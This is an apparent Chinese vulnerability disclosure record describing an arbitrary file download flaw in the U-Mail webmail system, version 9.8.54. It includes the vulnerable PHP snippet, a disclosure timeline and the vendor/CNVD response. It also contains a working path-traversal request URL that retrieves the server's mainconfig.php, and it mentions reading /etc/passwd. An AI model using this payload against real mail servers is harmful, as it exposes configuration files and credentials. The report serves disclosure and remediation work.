漏洞概要
关注数(24)
关注此漏洞
漏洞标题:U-Mail邮件系统任意文件下载漏洞
提交时间:2014-05-13 01:09
修复时间:2014-08-11 01:10
公开时间:2014-08-11 01:10
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情
披露状态:
2014-05-13: 细节已通知厂商并且等待厂商处理中
2014-05-16: 厂商已经确认,细节仅向厂商公开
2014-05-19: 细节向第三方安全合作伙伴开放
2014-07-10: 细节向核心白帽子及相关领域专家公开
2014-07-20: 细节向普通白帽子公开
2014-07-30: 细节向实习白帽子公开
2014-08-11: 细节向公众公开
简要描述:
U-Mail邮件系统某处处理不当,导致任意文件下载漏洞
详细说明:
漏洞文件:C:\umail\WorldClient\html\client\mail\module\o_mail.php
代码:
其中
$file = gss( $_GET['file'] );//获得文件名
if ( file_exists( $file ) && is_file( $file ) )//如果文件存在且是文件则直接执行下载
:(
好吧,这样就可以下载任意文件了,
注:此处演示的是官网下载的最新版,windows server 2003搭建,且都为默认配置
ok,想下载哪些文件随意,未测试linux下的/etc/passwd
此处下载网站根目录下的配置文件,默认加密了的,解密即可
http://fuckyou.com/webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
软件设置的mysql默认端口为6033,应该没开启外连的,未具体测试
:(
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2014-05-16 18:33
厂商回复:
CNVD在贵司官网下载的9.8.54版本存在此漏洞,其他实例因无账号无法登陆。由CNVD通过公开渠道联系深圳市福洽科技有限公司处置。
最新状态:
暂无